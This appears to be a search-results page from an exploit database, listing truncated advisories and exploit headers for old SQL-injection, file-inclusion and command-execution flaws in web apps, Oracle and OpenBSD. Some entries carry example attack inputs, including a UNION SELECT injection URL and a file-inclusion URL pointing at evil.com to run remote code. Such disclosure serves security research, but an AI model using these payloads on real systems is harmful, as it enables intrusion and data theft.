1622 matches found
GuppY <= 4.5.16 Remote Commands Execution Exploit
No description provided by source. ?php printr' --------------------------------------------------------------------------- Guppy = 4.5.16 remote commands execution exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org dork: "Site powered by GuppY" | "Site créé avec Gupp...
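Makit Newsposter Script News_Page.ASP SQL Injection Vulnerability
Makit Newsposter Script is an ASP-based web application. Makit Newsposter Script does not properly filter user-supplied input, so remote attackers can exploit the vulnerability to carry out SQL injection attacks and obtain sensitive information. The problem is that the 'NewsPage.ASP' script does not filter the user-supplied 'uid' parameter; submitting malicious SQL code as the parameter data can alter the original SQL logic, leading to disclosure of sensitive information. Makit Newsposter Script No detailed solution is currently available: http://www.makit.net/...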
aspedge12b-sql.txt
Title : ASP EDGE = V1.2b user.asp Remote SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://aspedge.cjb.net || http://www.planetsourcecode.com/vb/scripts/ShowCode.asp?txtCodeId=7530&lngWId=4 $$ : Free SQL---------------------------------------------------------...
Forum Livre 1.0 (SQL Injection / XSS) Multiple Remote Vulnerabilities
No description provided by source. Title : Forum Livre 1.0 Multiple Remote Vulnerabilities Author : ajann Contact : : $$ : Free SQL--------------------------------------------------------- Login Before..- http://target/path//infouser.asp?user=SQL Example:...
SQL Injection in Unique Ads ( UDS )
Hello Vulnerable : uds Version: 1.x web : http://www.egyptechno.com The bug : http://example.com/uds/banner.php?bid=SQL Example : http://example.com/uds/banner.php?bid=-5520union20select20null,null,null20from20uds ,,,,,,, Discovery By : LinuxDrox www.LeZr.com Best Regards ,,...
LocazoList 2.01a beta5 - 'subcatID' SQL Injection
Title : LocazoList = v2.01a beta5 subcatID Remote SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://www.locazo.net:81 Dork : "Powered by Locazolist Copyright © 2006" $$ : $100 SQL---------------------------------------------------------...
Backup implementation
Backup implementation I. Intro II. Tools III. Strategy Well, now let's talk about how to live with all this correctly. The backup process consists of three stages: planning, implementation and support. We have already talked a little about support and implementation, but planning is the most...
x-news 1.1 - users.txt Remote Password Disclosure
x-news 1.1 - users.txt Remote Password Disclosure x-news 1.1 Password Disclosure Vulnerability Affected Software: x-news 1.1 x-news Website: http://xqus.com Bugfounder: bd0rk Website: www.soh-crew.it.tt Contact: bd0rkathackermail.com Greetings: str0ke, Perle, TheJT, ajann +Exploit:...
Calendar MX BASIC <= 1.0.2 (ID) Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications ================================================================== Calendar MX BASIC = 1.0.2 ID Remote SQL Injection Vulnerability ================================================================== Title : Calendar MX BASIC = 1.0.2 ID Remo...
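Typo3 Class.TX_RTEHTMLArea_PI1.PHP Multiple Command Execution Vulnerabilities
Typo3 is a PHP-based web application. Typo3 does not properly filter user-supplied input, so remote attackers can exploit the vulnerability to execute arbitrary commands with the privileges of the web server. The problem is that the script does not filter the user-supplied 'useruid' parameter; submitting a string containing shell metacharacter commands as the parameter data can lead to arbitrary command execution with web server privileges. Typo3 Typo3 4.0.3 Typo3 Typo3 4.0.2 Typo3 Typo3 4.0.1 Typo3 Typo3 3.7 .0 Typo3 Typo3 4.0 Typo3 Typo3 3.8 http://typo3.org/ Attackers can exploit these issues via ...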
3editor CMS <= 0.42 (index.php) Local File Include Vulnerability
No description provided by source. script Name: 3editor CMS index.php Local File Include Exploit Download:http://www.matteolucarelli.net/3editor/index.htm Author : Dr Max Virus Contact :[email protected] Bug & Problem In file index.php Let's Take a look; if !isset$GET'page'...
Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit
No description provided by source. -- -- $Id: raptororaextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ -- -- raptororaextproc.sql - command exec via oracle extproc -- Copyright c 2006 Marco Ivaldi [email protected] -- -- Directory traversal vulnerability in extproc in Oracle 9i and 10g --...
Microsoft Windows csrss (?) memory corruption exploited in-the-wild
Dear [email protected], On one Russian forum a security vulnerability in Microsoft Windows is discussed (Windows XP is tested). The vulnerability is caused by memory corruption if a string beginning with "?" is sent through the MessageBox API with the MBSERVICENOTIFICATION flag. It looks like some "debug"...
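PSlash lvc_include_dir Remote File Inclusion Vulnerability
PSlash is a PHP-based web application. PSlash does not properly filter user-supplied URI data, so remote attackers can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that the 'config.inc.php' script does not filter the user-supplied 'lvcincludedir' parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with the privileges of the web process. Derek Leung pSlash 0.70 http://www.pslash.com/...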
CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& milw0rm.com 2006-12-08...
CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ================================================================== CM68 News = 12.02.06 addpth Remote File Inclusion Vulnerability ================================================================== Vulnerable Software:cm68news Vulnerable...
uPhotoGallery 1.1 - Slideshow.asp?ci SQL Injection
uPhotoGallery 1.1 - Slideshow.asp?ci SQL Injection source: https://www.securityfocus.com/bid/21319/info uPhotoGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allo...
2020 Real Estate 3.2 - listings.asp SQL Injection
2020 Real Estate 3.2 - listings.asp SQL Injection source: https://www.securityfocus.com/bid/21036/info 20/20 Real Estate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an...
PHP-Post <= 1.01 (template) Remote Code Execution Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print '...
OpenBSD ftp Exploit (teso)
No description provided by source. / 7350-crocodile - x86/OpenBSD ftp exploit by lorian and scut / TESO=20 TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. The contents of these coded instructions, statements and computer programs may not be...